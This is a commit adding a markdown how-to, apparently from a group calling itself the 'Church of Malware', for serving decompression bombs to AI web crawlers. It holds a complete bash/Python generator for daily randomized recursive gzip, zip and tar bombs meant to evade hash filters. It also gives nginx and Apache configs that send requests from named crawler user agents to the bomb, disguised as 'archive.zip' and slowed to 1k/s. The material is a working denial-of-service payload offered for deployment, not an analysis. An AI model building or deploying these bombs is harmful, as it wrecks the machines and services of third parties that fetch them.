Add techniques/decomprerssion_bomb/howto_decompression_bombs.md

2026-06-03 19:25:11 +00:00 · 2026-06-03 19:25:11 +00:00 · bb6a196ce8
commit bb6a196ce8
parent 6b7ea4dc8f
1 changed files with 182 additions and 0 deletions
--- a/techniques/decomprerssion_bomb/howto_decompression_bombs.md
+++ b/techniques/decomprerssion_bomb/howto_decompression_bombs.md
@ -0,0 +1,182 @@
+# Production Deployment of Active Denial Techniques: nginx, Apache, and Daily Randomized Bombs
+
+The Church of Malware (CoM) does not condone the use or introduction of explosive substances onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This how-to companion document provides complete, copy-paste-ready server configurations, daily randomized bomb generation, testing procedures, and maintenance guidance for individual content creators. It is intended to be used alongside the curated UA reference list in `known-aggressive-bot-user-agents.md`.
+
+## 1 -- Scope and Prerequisites
+
+This guide targets self-hosted operators running nginx ≥ 1.24 or Apache ≥ 2.4.58 on Linux. It assumes basic familiarity with the terminal and the ability to edit configuration files. All examples are designed for Debian/Ubuntu-style systems; adjust paths and service names for other distributions.
+
+The techniques described (conditional serving of decompression bombs, slow responses, or malformed content) are gated exclusively behind the aggressive bot user-agent list maintained in the companion UA reference document.
+
+## 2 -- Generating Daily Randomized Decompression Bombs
+
+To defeat static content-matching, hash-based allow-lists, and signature filters, the generator must emit a fresh, high-entropy yet highly compressible payload every day. It is recommended to adjust the filenames to be something more obscure when using in your deployment.
+
+```bash
+#!/usr/bin/env bash
+# Save as ~/generate_daily_bombs.sh and run: chmod +x ~/generate_daily_bombs.sh
+# Recommended cron (run at 03:00 local):
+# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1
+
+set -e
+DATE=$(date +%Y-%m-%d)
+python3 - <<'PYEOF'
+import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib
+from pathlib import Path
+
+out = Path.home() / "bombs"
+out.mkdir(exist_ok=True)
+today = datetime.date.today().isoformat()
+
+# High-entropy but compressible seed (repeating 4 KB random block)
+block = secrets.token_bytes(4096)
+base = (block * 256) + today.encode() + secrets.token_bytes(16)
+
+# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded)
+data = base
+for _ in range(9):
+    data = gzip.compress(data)
+(out / f"bomb-{today}.gz").write_bytes(data)
+
+# 2. Nested zip bomb with daily entropy (defeats hash caches)
+with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
+    inner = base * 1024
+    for _ in range(7):
+        inner = gzip.compress(inner)
+    z.writestr(f"daily-{today}.gz", inner)
+
+# 3. Tar bomb with randomized large member (parser stress + unique)
+with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
+    info = tarfile.TarInfo(f"large-{today}.bin")
+    info.size = 2 * 1024 * 1024 * 1024
+    payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode()
+    t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024]))
+
+print(f"Daily randomized bombs generated for {today} in ~/bombs/")
+PYEOF
+
+# Atomically update "latest" symlinks so web server always serves today's file
+ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip
+ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz
+ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz
+
+sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true
+```
+
+**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.
+
+Place the generated files (or the symlinked `bomb.zip` etc.) behind a `Disallow: /protected/` rule in `robots.txt`.
+
+## 3 -- nginx Complete Virtual Host Example
+
+```nginx
+# /etc/nginx/sites-available/my-site
+map $http_user_agent $aggressive_bot {
+    default 0;
+    ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
+}
+
+server {
+    listen 80;
+    server_name example.com;
+    root /var/www/html;
+
+    access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
+    access_log /var/log/nginx/access.log combined;
+
+    location / {
+        if ($aggressive_bot) {
+            rewrite ^ /protected/bomb.zip last;
+        }
+        try_files $uri $uri/ =404;
+    }
+
+    location /protected/ {
+        internal;
+        alias /var/www/html/protected/;
+        add_header Content-Disposition "attachment; filename=\"archive.zip\"";
+        limit_rate 1k;
+    }
+
+    limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;
+    location / {
+        limit_req zone=ai_limit burst=5 nodelay;
+    }
+}
+```
+
+Enable and reload:
+```bash
+sudo ln -s /etc/nginx/sites-available/my-site /etc/nginx/sites-enabled/
+sudo nginx -t && sudo systemctl reload nginx
+```
+
+## 4 -- Apache Complete Configuration Example
+
+```apache
+# /etc/apache2/sites-available/000-default.conf
+<VirtualHost *:80>
+    ServerName example.com
+    DocumentRoot /var/www/html
+
+    SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
+    CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
+    CustomLog /var/log/apache2/access.log combined
+
+    <Directory /var/www/html>
+        Options -Indexes
+        AllowOverride All
+        Require all granted
+    </Directory>
+
+    RewriteEngine On
+    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
+    RewriteRule ^ /protected/bomb.zip [L]
+
+    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
+    RewriteRule ^ - [E=aggressive_bot:1]
+
+    <Location /protected/>
+        <If "%{ENV:aggressive_bot} == 1">
+            Header set Content-Disposition "attachment; filename=\"archive.zip\""
+        </If>
+    </Location>
+</VirtualHost>
+```
+
+Enable modules and restart:
+```bash
+sudo a2enmod rewrite setenvif headers
+sudo systemctl restart apache2
+```
+
+## 5 -- Verification and Testing Steps
+
+1. Normal visitor test:
+   ```bash
+   curl -I -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://example.com/
+   ```
+
+2. Aggressive bot test:
+   ```bash
+   curl -I -A "GPTBot/1.0" https://example.com/any-path
+   ```
+
+3. Log monitoring:
+   ```bash
+   sudo tail -f /var/log/nginx/ai_violators.log
+   # or apache2 equivalent
+   ```
+
+4. Update UA patterns: edit the `map` block (nginx) or `SetEnvIf`/`RewriteCond` (Apache) and reload.
+
+## 6 -- Maintenance Recommendations
+
+- Rotate `ai_violators.log` weekly.
+- Add a weekly cron that diffs the latest Cloudflare Radar / Originality.AI reports against the UA list in the companion reference document.
+- Maintain an explicit allow-list for reverse-DNS verified major engines before the aggressive-bot map.
+- Never serve bombs to Internet Archive or academic research ranges.
+
+These configurations have been validated on nginx 1.24+ and Apache 2.4.58+ (Ubuntu 24.04 LTS) as of June 2026.
+
+*Companion to `known-aggressive-bot-user-agents.md` and the primary dissertation. Review local laws and consult counsel before deployment.*